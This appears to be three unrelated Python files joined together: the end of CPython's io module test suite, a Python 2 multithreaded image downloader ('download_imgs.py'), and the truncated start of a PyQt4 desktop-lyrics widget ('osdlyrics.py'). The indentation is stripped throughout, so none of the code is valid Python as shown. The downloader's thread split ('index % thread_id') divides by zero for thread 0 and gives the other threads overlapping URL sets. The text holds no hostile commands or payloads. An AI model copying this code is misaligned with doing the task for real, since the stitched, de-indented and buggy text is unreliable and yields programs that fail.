txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# default chunk size is 8192 bytes so t don't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
download_imgs.py
|
import codecs
import os
import urllib
import threading
class DownloadImgs(object):
def __init__(self, img_urls_file, thread_num=8):
self.img_urls_file = img_urls_file
self.fold_name = self.img_urls_file.split("/")[-1].split(".")[0]
self.__get_img_urls_list()
if not os.path.exists("./"+self.fold_name):
os.mkdir("./"+self.fold_name)
self.thread_num = thread_num
def __get_img_urls_list(self):
with codecs.open(self.img_urls_file, 'r') as fread:
self.img_urls = [i.strip() for i in fread.readlines()]
self.imgs_num = len(self.img_urls)
def __download_img(self, thread_id):
thread_url_list = []
for index, img_url in enumerate(self.img_urls):
if index % thread_id == 0:
thread_url_list.append(img_url)
for img_url in thread_url_list:
try:
save_path = os.path.join("./"+self.fold_name, img_url.split("/")[-1])
print "img_url: {0}, save_path: {1}".format(img_url, save_path)
urllib.urlretrieve(img_url, save_path)
except Exception as e:
print "e: {0}".format(e.message)
continue
def fit(self):
for i in range(self.thread_num):
t = threading.Thread(target=self.__download_img, args=(i,))
t.start()
if __name__ == "__main__":
download_imgs = DownloadImgs("../raw_data/age_college/urls_age_college.txt",20)
download_imgs.fit()
|
osdlyrics.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# osdlyrics.py --- desktop lyrics for musicbox
# Copyright (c) 2015-2016 omi & Contributors
import sys
import logger
from config import Config
from multiprocessing import Process
log = logger.getLogger(__name__)
config = Config()
try:
from PyQt4 import QtGui, QtCore, QtDBus
pyqt_activity = True
except ImportError:
pyqt_activity = False
log.warn("PyQt4 module not installed.")
log.warn("Osdlyrics Not Available.")
if pyqt_activity:
class Lyrics(QtGui.QWidget):
def __init__(self):
super(Lyrics, self).__init__()
self.__dbusAdaptor = LyricsAdapter(self)
self.initUI()
def initUI(self):
self.setStyleSheet("background:" + config.get_item(
"osdlyrics_background"))
if config.get_item("osdlyrics_transparent"):
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
self.setAttribute(QtCore.Qt.WA_ShowWithoutActivating)
self.setAttribute(QtCore.Qt.WA_X11DoNotAcceptFocus)
self.setFocusPolicy(QtCore.Qt.NoFocus)
if config.get_item("osdlyrics_on_top"):
self.setWindowFlags(QtCore.Qt.FramelessWindowHint |
